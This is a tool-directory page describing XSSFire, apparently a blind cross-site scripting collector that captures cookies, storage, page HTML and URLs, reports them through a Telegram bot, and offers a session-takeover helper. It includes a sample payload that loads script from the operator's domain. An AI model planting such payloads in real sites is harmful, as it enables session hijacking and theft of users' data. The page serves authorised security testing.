Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
XSSFire — A standalone Blind XSS Script. | Kitploit
Tools/GitHubGitHub/seifelsallamy/xssfire
ExploitationWeb Application ExploitationData ExfiltrationInformation GatheringWeb SecurityPenetration Testing
GitHubseifelsallamy/xssfire

XSSFire

A standalone Blind XSS Script.

View Repository
47101 year agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

XSSFire

A standalone Blind XSS Script.

How it works:

The script is a combination between PHP and JavaScript, it captures the data using JS and send it to the script itself, then it generates report files and deliver them through telegram.

Requirements:

  1. Web Server running on Linux with a domain and an SSL certificate.
  2. Telegram account (To receive BXSS reports)

Why Telegram?

Easy to setup. Fast. Reachable.

Features:

  1. Captures: IP, User-Agent, Date-Time, Local Storage, Session Storage, Cookies, Referrer, Origin, URL, HTML, If fired from an Iframe
  2. Session Builder: A JavaScript that can rebuild the session, open the captured URL and the devtools then paste it in the console and hit enter. If you're luck enough you can takeover the session.
  3. Telegram Notifications: Faster and easier to setup than e-mails and more reachable.
  4. Anti-Spam: You should only receive one/two notification for each captured URL. However, the script resets every once in a while to notify you again later.
  5. Encryption: You can set a password in the script and the report you receive in telegram will be a zip file protected by a password. (Telegram bots are not using end-to-end encryption).
  6. HTML Snapshot: Is an HTML file that will be delivered with the report, it should look similar to the page of your target.

Setup:

  1. Go to telegram and have a chat with the @botfather.
  2. Write /start in the chat and create new bot.
  3. You should receive your bot token when you create it.
  4. Save the token aside.
  5. Now go to your newly created bot chat and start it then say hi.
  6. Then go to: https://api.telegram.org/bot<bot_token>/getUpdates
  7. And save your chat id.
  8. Open the XSSFire Script and modify the following lines:
root@kitploit:~
$chat_id = "<Telegram Chat ID>"; // Your Telegram Chat ID
$token = "<Telegram Bot Access Token>"; // Your telegram Bot Access token
$password = False; //Protect the Blind XSS Report with a password. Leave as False if not used.
  1. Upload the script to your server.

To generate payloads you might consider using the Blind-XSS-Manager https://github.com/SeifElsallamy/Blind-XSS-Manager You can simply create payloads through this extension by entering yourdomain.com/

Note: you can change the file name to index.php and upload it to your server main directory to make the payloads shorter, then the payload should look similar to this <script src="https://yourdomain.com"></script>.

Snapshots:

bxss bxss2 bxss3

Thanks to GPT-3 xD

Download Tool